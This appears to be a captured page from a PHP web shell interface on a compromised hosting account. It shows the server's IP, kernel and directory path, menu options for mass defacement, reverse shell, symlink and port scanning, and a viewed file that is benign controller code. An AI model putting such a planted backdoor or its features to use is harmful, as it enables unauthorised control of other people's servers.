Tul xxx Tul
User / IP
:
216.73.216.217
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
vendefacil2
/
config
/
app
/
Viewing: Controller.php
<?php class Controller{ public $views, $model; public function __construct() { $this->views = new Views(); $this->cargarModel(); } public function cargarModel() { $model = get_class($this).'Model'; $ruta = 'models/' . $model . '.php'; if (!file_exists($ruta)) { $files = scandir('models'); foreach ($files as $file) { if (strcasecmp($file, $model . '.php') === 0) { $ruta = 'models/' . $file; $model_class = str_ireplace('.php', '', $file); require_once $ruta; if (class_exists($model_class)) { $this->model = new $model_class(); } else { // Fallback to original model name if the file's class is still the expected one $this->model = new $model(); } return; } } } if (file_exists($ruta)) { require_once $ruta; $this->model = new $model(); } } }
Coded With 💗 by
0x6ick